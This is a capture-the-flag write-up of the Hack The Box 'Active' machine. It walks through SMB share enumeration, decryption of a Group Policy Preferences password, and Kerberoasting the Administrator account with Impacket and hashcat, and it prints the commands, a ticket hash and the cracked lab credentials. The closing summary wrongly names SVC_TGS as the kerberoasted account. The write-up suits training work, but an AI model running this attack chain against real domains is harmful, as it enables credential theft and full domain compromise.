Physical Address
304 North Cardinal St.
Dorchester Center, MA 02124
Active – Hack The Box
Kerberoasting
Task 1 – How many SMB shares are shared by the target?
- Let’s start first by enumerating using nmap to know open ports
nmap -sV -sC -sT 10.129.2.174
Starting Nmap 7.95 ( <https://nmap.org> ) at 2026-02-12 20:04 CET
Nmap scan report for 10.129.2.174
Host is up (0.75s latency).
Not shown: 983 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-02-12 19:04:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-02-12T19:05:04
|_ start_date: 2026-02-12T18:58:25
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 69.69 seconds
- We see port 445 open which has SMB on it. Let’s enumerate the shares using enum4linux:
enum4linux -S 10.129.2.174
Starting enum4linux v0.9.1 ( <http://labs.portcullis.co.uk/application/enum4linux/> ) on Thu Feb 12 20:11:05 2026
=========================================( Target Information )=========================================
Target ........... 10.129.2.174
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.129.2.174 )============================
[E] Can't find workgroup/domain
===================================( Session Check on 10.129.2.174 )===================================
[+] Server 10.129.2.174 allows sessions using username '', password ''
================================( Getting domain SID for 10.129.2.174 )================================
do_cmd: Could not initialise lsarpc. Error was NT_STATUS_ACCESS_DENIED
[+] Can't determine if host is part of domain or part of a workgroup
=================================( Share Enumeration on 10.129.2.174 )=================================
do_connect: Connection to 10.129.2.174 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.129.2.174
//10.129.2.174/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//10.129.2.174/C$ Mapping: DENIED Listing: N/A Writing: N/A
//10.129.2.174/IPC$ Mapping: OK Listing: DENIED Writing: N/A
//10.129.2.174/NETLOGON Mapping: DENIED Listing: N/A Writing: N/A
//10.129.2.174/Replication Mapping: OK Listing: OK Writing: N/A
//10.129.2.174/SYSVOL Mapping: DENIED Listing: N/A Writing: N/A
//10.129.2.174/Users Mapping: DENIED Listing: N/A Writing: N/A
enum4linux complete on Thu Feb 12 20:11:17 2026
- We get 7 shares
Task 2 – What is the name of the share that allows anonymous read access?
- We try to connect to each share using smbclient, we get Anonymous login successful on Replication share:
smbclient \\\\\\\\10.129.2.174\\\\Replication
Password for [WORKGROUP\\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \\>
- Inside replication we find active.htb. I downloaded everything in it using the following command:
recurse ON
mget *
Task 3 – Which file has encrypted account credentials in it?
- Diving in the folders we downloaded, we find Groups.xml that contains credentials:
- The encrypted credentials are:
- username:active.htb\\SVC_TGS
- password: edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
Task 4 – What is the decrpyted password for the SVC_TGS account?
- Reading this article, we find it is a group policy file that contains a password encrypted using AES. The key utilized with AES is static and publicly available. We can find the key here
- We can decrypt it using gpp-decrypt on kali linux:
┌──(kali㉿kali)-[~/Desktop]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
- Now we have the following credentials:
- username: active.htb\\SVC_TGS
- password: GPPstillStandingStrong2k18
- Using the credentials found, I tried to connect to the shares again. I got access to Users share:
──(kali㉿kali)-[~/Desktop]
└─$ smbclient //10.129.2.174/Users -U active.htb\\\\SVC_TGS
Password for [ACTIVE.HTB\\SVC_TGS]:
Try "help" to get a list of possible commands.
smb: \\> ls
. DR 0 Sat Jul 21 16:39:20 2018
.. DR 0 Sat Jul 21 16:39:20 2018
Administrator D 0 Mon Jul 16 12:14:21 2018
All Users DHSrn 0 Tue Jul 14 07:06:44 2009
Default DHR 0 Tue Jul 14 08:38:21 2009
Default User DHSrn 0 Tue Jul 14 07:06:44 2009
desktop.ini AHS 174 Tue Jul 14 06:57:55 2009
Public DR 0 Tue Jul 14 06:57:55 2009
SVC_TGS D 0 Sat Jul 21 17:16:32 2018
5217023 blocks of size 4096. 279525 blocks available
smb: \\>
- I then found the flag on SVC_TGS\Desktop\user.txt
a1afd274962a74d4297861b9f2a6bd31
Task 6 – Which service account on Active is vulnerable to Kerberoasting?
- I listed SPN accounts using GetUserSPNs.py
──(kali㉿kali)-[~/Desktop]
└─$ ./GetUserSPNs.py -dc-ip 10.129.2.174 active.htb/SVC_TGS
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2026-02-12 19:59:30.267352
- We get the Administrator is vulnerable to kerberoasting
Task 7 – What is the plaintext password for the administrator account?
- I requested the administrator TGS using the GetUserSPNs.py:
└─$ ./GetUserSPNs.py -dc-ip 10.129.2.174 active.htb/SVC_TGS -request-user Administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2026-02-12 19:59:30.267352
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f2a948cec4a64300405ea86b517a3b9d$3d11cc0fe9a60c2dd3cb184a2881007f7971e315b18f62e92336dde4742d00d66bf556e626150f35fe075e412f63adfbff771dfe055257691782e9ce93e4b67ef78e9b713d55276072227ac13888f648516b3b0d72cd52846d37d1ff5319ebdd79258a4f97d2b68d2ead14f2091be0c4e455acf99037f5074c890d69ff0edb217cf2c28a626210425faaa0fffae525dba45f9c071c12c5ebc0de6a00bcb2191d9c2d104617bff3b9601fd103eaab81945019d828022a7919d6f16f0ef7734c2f09b556cff820a73629be776b55c726ed4cd6aa5b8e246525b0f7b205c702ad65ca02b1063939582844d8cf9147077b8394fcab6ccb8763a00aa8095b52379fb7adfeececa66ba436000e2086bdaa19f79aa34be003bcf4e7666aab2b52bd455205d422049c0f2d720ffc17f8117c391f58e8f5fbf85768e5d7fc609c185dd815d642a267684f95f9d470cd1221e886a7e9de6eb181f9542070a280d28d3b4ffceb274f604b748bda48a5178dfd0c26e0bdae15dcc9585fef77a8e7f6a7916da818b5116c35ebff1e710a1fa347556969bebbb0e775c45a572fe8ca76964eda62ac0b6fe5673673784426034526844f8c755c949ff9b7ae3d512f55c086696211482cc8579b8a9392e0fa402b2f2d6f634b9a724eb282ebf2187e9e2c41d890e5f05b3291ab049c46f0381e99803b2f8da8b7c732eac5bc787a8078785325f5cac6f4c36939f3195a7adbdc77dfc2141ad2dfd2ae481b9b4d57fe893511803dbf44ced0a7e737c8500b2c226c78626997c1151811110a2abe7f2da09c08f36ac4564df328e9e7a7aa2f29a16bd2d1f00a38456870b93b34bb4236f6786d4d0302b44e540c47b98ec6c9c985866e38449b013725604b6a84504db4c88d809c9ba57670109d6d4cb3a1c0e9ace519791c01b98bb483d01859dd52c59df70956b1a824148324ff167598879a50240847e86788cb6bc5b9d8b2f1ba8c89f306809eb8c578378caf9b451ab11a86e03cf191e0f1ba493b81112f4a7d98f6eab50474f44d11bb361114c644570e38034a8775e161171c4095cfb62795e19000506b36bba8973b87d14e55493095a24dbef6498565b322f7b9c6affc385bb70c3fd5f0722718d4e334e6d03293e4279338ca1950d65d7fe1f432ce1608369537e000876960cee6be632d709addeedf42a8bedbe0da47
- I then saved the hash to a file
- I then cracked the hash using hashchat and the following command:
hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt
- The password is Ticketmaster1968 and we now have the following credentials:
- username: Administrator
- password: Ticketmaster1968
- I then connected to the users share using the Administrator credentials:
smbclient //10.129.2.174/Users -U active.htb\\\\Administrator
- The flag can be found on Administrator\Desktop\root.txt
Summary
Active is an easy-level Windows machine on Hack The Box that focuses on fundamental Active Directory enumeration and Kerberoasting techniques. Initial access begins with SMB enumeration, where accessible shares such as SYSVOL and NETLOGON reveal domain information and potential credentials. After identifying domain users, service accounts with Service Principal Names (SPNs) are enumerated using tools like GetUserSPNs.py. A Kerberos Ticket Granting Service (TGS) ticket is then requested for a vulnerable service account (e.g., SVC_TGS), allowing extraction of a hash encrypted with the account’s password. This hash is cracked offline to recover valid credentials. Because the compromised service account possesses elevated privileges, this leads directly to privilege escalation and full domain compromise. Overall, Active is a strong introduction to Kerberos abuse in Active Directory environments and demonstrates how misconfigured service accounts can lead to complete administrative access.
